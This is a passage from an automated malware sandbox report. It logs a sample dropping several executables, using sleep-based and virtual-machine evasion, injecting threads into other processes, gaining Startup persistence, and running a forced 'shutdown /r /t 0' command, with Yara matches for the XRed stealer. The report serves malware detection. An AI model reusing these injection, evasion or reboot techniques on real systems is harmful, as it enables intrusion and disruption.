                      Source: C:\Windows\wic.exeCode function: 11_2_00EC2D32 __EH_prolog3_GS,GetParent,GetParent,UpdateWindow,SetCursor,GetAsyncKeyState,UpdateWindow,InflateRect,SetCapture,SetCursor,IsWindow,GetCursorPos,ScreenToClient,PtInRect,RedrawWindow,GetParent,GetParent,RedrawWindow,RedrawWindow,GetParent,GetParent,GetParent,InvalidateRect,UpdateWindow,UpdateWindow,NotifyWinEvent,NotifyWinEvent,SetCapture,RedrawWindow,SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageA,UpdateWindow,SendMessageA,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,11_2_00EC2D32
                      Source: C:\Windows\wic.exeCode function: 11_2_00ED3CAB GetClientRect,IsRectEmpty,IsWindow,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,GetWindowRect,GetParent,IsRectEmpty,EqualRect,EndDeferWindowPos,11_2_00ED3CAB
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB284A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_00BB284A
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\3.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\._cache_2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\._cache_2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\._cache_2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\._cache_2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\._cache_2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\._cache_2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\._cache_2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\._cache_2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\wic.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\wic.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\wic.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\wic.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\wic.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Contains functionality to implement multi-threaded time evasion
                      Source: C:\Program Files (x86)\3.exeCode function: 7_2_004019FC CreateThread,Sleep, call eax7_2_004019FC
                      Source: C:\Users\user\Desktop\._cache_2.exeMemory allocated: 7300000 memory reserve | memory write watch
                      Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXF308.tmpJump to dropped file
                      Source: C:\Program Files (x86)\4.exeDropped PE file which has not been started: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exeJump to dropped file
                      Source: C:\Windows\wic.exeDropped PE file which has not been started: C:\Windows\msslac.dllJump to dropped file
                      Source: C:\Program Files (x86)\4.exeDropped PE file which has not been started: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cghqi.exeJump to dropped file
                      Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXF376.tmpJump to dropped file
                      Source: C:\Windows\wic.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msslac[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\._cache_1.exeAPI coverage: 5.2 %
                      Source: C:\Windows\wic.exeAPI coverage: 4.5 %
                      Source: C:\Windows\cbas.exeAPI coverage: 4.2 %
                      Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7496Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\3.exe TID: 7612Thread sleep count: 162 > 30
                      Source: C:\Program Files (x86)\3.exe TID: 7612Thread sleep time: -81000s >= -30000s
                      Source: C:\Windows\cbas.exe TID: 8088Thread sleep count: 46 > 30
                      Source: C:\Windows\cbas.exe TID: 8088Thread sleep time: -92000s >= -30000s
                      Source: C:\Program Files (x86)\3.exeLast function: Thread delayed
                      Source: C:\Program Files (x86)\3.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\cbas.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040A2B0 GetDesktopWindow,FindFirstFileA,FileTimeToSystemTime,realloc,FindNextFileA,FindClose,qsort,SetFileAttributesA,SetFileAttributesA,DeleteFileA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,free,2_2_0040A2B0
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00407D50 SendMessageA,FindFirstFileA,realloc,FindNextFileA,FindClose,SetFileAttributesA,DeleteFileA,??3@YAXPAX@Z,free,Sleep,2_2_00407D50
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DCF9B3 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,8_2_00DCF9B3
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDDB70 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,8_2_00DDDB70
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,9_2_00D2BA94
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,9_2_00D3D420
                      Source: C:\Windows\wic.exeCode function: 11_2_00F3E027 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,11_2_00F3E027
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BC940B FindFirstFileExA,18_2_00BC940B
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DE1FA6 VirtualQuery,GetSystemInfo,8_2_00DE1FA6
                      Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                      Source: C:\Program Files (x86)\1.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: 1.exe, 00000001.00000003.1715724484.00000000007D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: file.exe, 00000000.00000002.1801335644.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3j
                      Source: Synaptics.exe, 00000003.00000002.3537477101.0000000000791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB-&
                      Source: file.exe, 00000000.00000003.1800217674.0000000000726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708813251.0000000000726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708777064.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3537477101.0000000000791000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3537477101.0000000000761000.00000004.00000020.00020000.00000000.sdmp, wic.exe, 0000000B.00000003.1823701424.000000000169D000.00000004.00000020.00020000.00000000.sdmp, wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wic.exe, 0000000B.00000002.3538860898.0000000001642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(0j
                      Source: ._cache_1.exe, 00000002.00000003.1739461967.000000000078F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
                      Source: ._cache_2.exe, 00000008.00000002.1889956699.0000000000D52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-130
                      Source: C:\Program Files (x86)\3.exeAPI call chain: ExitProcess graph end nodegraph_7-676
                      Source: C:\Program Files (x86)\3.exeAPI call chain: ExitProcess graph end nodegraph_7-740
                      Source: C:\Program Files (x86)\3.exeAPI call chain: ExitProcess graph end nodegraph_7-659
                      Source: C:\Users\user\Desktop\._cache_2.exeAPI call chain: ExitProcess graph end nodegraph_8-31857
                      Source: C:\Program Files (x86)\4.exeAPI call chain: ExitProcess graph end nodegraph_9-25631
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DE3559 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00DE3559
                      Source: C:\Windows\wic.exeCode function: 11_2_00E8827B OutputDebugStringA,GetLastError,11_2_00E8827B
                      Source: C:\Windows\wic.exeCode function: 11_2_00FD6896 VirtualProtect ?,-00000001,00000104,?,?,?,0000000011_2_00FD6896
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406A20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00406A20
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D491B0 mov eax, dword ptr fs:[00000030h]9_2_00D491B0
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BC91B6 mov eax, dword ptr fs:[00000030h]18_2_00BC91B6
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BC9183 mov eax, dword ptr fs:[00000030h]18_2_00BC9183
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BC913E mov eax, dword ptr fs:[00000030h]18_2_00BC913E
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BBE8A5 mov eax, dword ptr fs:[00000030h]18_2_00BBE8A5
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DF1450 GetProcessHeap,8_2_00DF1450
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DE3559 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00DE3559
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DE36EC SetUnhandledExceptionFilter,8_2_00DE36EC
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DE7833 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00DE7833
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DE29AB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00DE29AB
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00D40A0A
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D40B9D SetUnhandledExceptionFilter,9_2_00D40B9D
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D40D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00D40D8A
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D44FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00D44FEF
                      Source: C:\Windows\wic.exeCode function: 11_2_00FD3CED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00FD3CED
                      Source: C:\Windows\wic.exeCode function: 11_2_00FCBE77 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00FCBE77
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB87F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00BB87F0
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB3B98 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00BB3B98
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB3D93 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00BB3D93
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB3F26 SetUnhandledExceptionFilter,18_2_00BB3F26

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Contains functionality to inject threads in other processes
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BA5EC0 GetModuleFileNameA,Sleep,Sleep,OpenProcess,ReadProcessMemory,Sleep,ReadProcessMemory,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,GetVersionExA,GetModuleHandleA,GetProcAddress,Sleep,CreateRemoteThread,WaitForSingleObject,Sleep,VirtualFreeEx,CloseHandle,18_2_00BA5EC0
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\1.exe "C:\Program Files (x86)\1.exe" 0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\2.exe "C:\Program Files (x86)\2.exe" 0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\3.exe "C:\Program Files (x86)\3.exe" 0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\4.exe "C:\Program Files (x86)\4.exe" 0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\wic.exe "C:\Windows\wic.exe" 0Jump to behavior
                      Source: C:\Program Files (x86)\1.exeProcess created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe" 0Jump to behavior
                      Source: C:\Program Files (x86)\1.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                      Source: C:\Program Files (x86)\2.exeProcess created: C:\Users\user\Desktop\._cache_2.exe "C:\Users\user\Desktop\._cache_2.exe" 0Jump to behavior
                      Source: C:\Windows\wic.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "shutdown /r /t 0"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0
                      Source: C:\Program Files (x86)\3.exeCode function: 7_2_00401D63 cpuid 7_2_00401D63
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: GetLocaleInfoW,8_2_00DDD314
                      Source: C:\Program Files (x86)\4.exeCode function: GetLocaleInfoW,GetNumberFormatW,9_2_00D3C093
                      Source: C:\Windows\wic.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoEx,GetLocaleInfoW,11_2_00EA7900
                      Source: C:\Windows\cbas.exeCode function: GetLocaleInfoW,18_2_00BC209E
                      Source: C:\Windows\cbas.exeCode function: GetLocaleInfoW,18_2_00BCC229
                      Source: C:\Windows\cbas.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_00BCC352
                      Source: C:\Windows\cbas.exeCode function: GetLocaleInfoW,18_2_00BCC45A
                      Source: C:\Windows\cbas.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_00BCC52D
                      Source: C:\Windows\cbas.exeCode function: EnumSystemLocalesW,18_2_00BC1A34
                      Source: C:\Windows\cbas.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,18_2_00BCBBE2
                      Source: C:\Windows\cbas.exeCode function: GetLocaleInfoW,18_2_00BCBDBC
                      Source: C:\Windows\cbas.exeCode function: EnumSystemLocalesW,18_2_00BCBEB0
                      Source: C:\Windows\cbas.exeCode function: EnumSystemLocalesW,18_2_00BCBE65
                      Source: C:\Windows\cbas.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_00BCBFD9
                      Source: C:\Windows\cbas.exeCode function: EnumSystemLocalesW,18_2_00BCBF4B
                      Source: C:\Program Files (x86)\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDE674 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,8_2_00DDE674
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040A4E0 GetVersionExA,MessageBoxA,GetDesktopWindow,_strcmpi,_strcmpi,_strcmpi,sprintf,MessageBoxA,MessageBoxA,MessageBoxA,2_2_0040A4E0

                      Stealing of Sensitive Information

                      barindex
                      Yara detected XRed
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1.exe PID: 1344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5236, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXF376.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\1.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                      Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXF308.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXF181.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\2.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected XRed
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1.exe PID: 1344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5236, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXF376.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\1.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                      Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXF308.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXF181.tmp, type: DROPPED
